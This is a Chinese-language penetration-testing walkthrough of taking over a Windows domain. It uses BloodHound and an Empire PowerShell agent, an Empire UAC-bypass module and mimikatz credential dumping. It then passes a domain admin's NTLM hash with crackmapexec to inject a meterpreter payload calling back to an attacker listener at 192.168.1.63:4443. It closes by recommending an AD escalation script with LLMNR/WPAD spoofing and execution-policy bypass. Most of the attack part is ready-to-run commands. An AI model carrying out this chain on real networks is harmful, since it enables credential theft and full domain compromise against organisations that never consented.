使用Empire進行域滲透
我現在收集了本地使用者憑據並升級到本地管理員,我的下一步目標是想要拿到DC許可權。由於我是本地管理員,我可以使用Bloodhound,它將幫我畫出整個域並顯示我的下一個目標的位置。在我的Windows主機上執行Bloodhound之後(wiki: ofollow,noindex">https://github.com/BloodHoundAD/Bloodhound/wiki),然後我確定了域管理員Jaddmon登入的伺服器是2008R2SERV。
ps:Bloodhound怎麼玩?看 這裡
我的第一步是嘗試使用Crackmapexec來呼叫Mimikatz並轉儲憑據,但是這臺機器上的SMB不允許登入,所以我必須找到另一種方法。
由於我擁有本地管理員許可權,因此我繼續將RDP引入伺服器,然後我使用Empire在伺服器上獲得一個shell。
使用Empire很簡單:啟動之後,然後啟動一個監聽器,如下所示
然後生成payload:
launcher powershell http
生成一個powershell payload,開始監聽。
我複製這個命令,切換到RDP會話,開啟命令提示符並貼上它。
當它執行時,我在Empire看到我現在在那臺機器上有一個代理。
要與它進行互動,我先輸入:
agents
然後:
interact VLLRZY4EC (代理的name)
即使我是本地管理員,我仍然必須繞過UAC。幸運的是,Empire有一個模組。然後輸入:
usemodule privesc/bypassuac
set Listener http
然後我在機器上獲得另一個代理,然後我再次與該新代理進行互動。
下面就是dump 一些憑證:
mimikatz
creds
然後我看到域管理員雜湊密碼。
我不會破解密碼,因為這很簡單。相反,我將使用Crackmapexec傳遞雜湊值。
然後就是通過crackmapexec:
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST = 192.168.1.63 LPORT = 4443
msf開啟監聽:
拿到DC許可權:
0x03 總結
這是利用Active Directory配置錯誤進入域管理員的眾多方法之一 。如前所述,這不是滲透測試的結束。我接下來的步驟是嘗試其他方法來訪問域管理員或任何其他帳戶,因為進行了滲透測試是要發現網路中的所有bug,而不僅僅是一個漏洞。
0x04 彩蛋
最後,推薦這個博主的一個Active Directory評估和許可權提升指令碼
https://github.com/hausec/ADAPE-Script/tree/master功能如下:
- 通過WPAD,LLMNR和NBT-NS欺騙收集雜湊值
- 檢查GPP密碼(MS14-025)
- 繪製域並通過BloodHound識別目標
- 檢查許可權提升方法
- 在網路上搜索開放的SMB共享
- 搜尋敏感檔案和字串的這些共享和其他可訪問目錄
- 檢查網路上的系統補丁
- 搜尋檔案伺服器
- 搜尋附加票據
- 收集域策略
Shell/">PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
以及github上一個大牛整合的cs指令碼,skr。
https://github.com/invokethreatguy/CSASC
體驗完這些指令碼我可能會總結一下,以及cna的開發。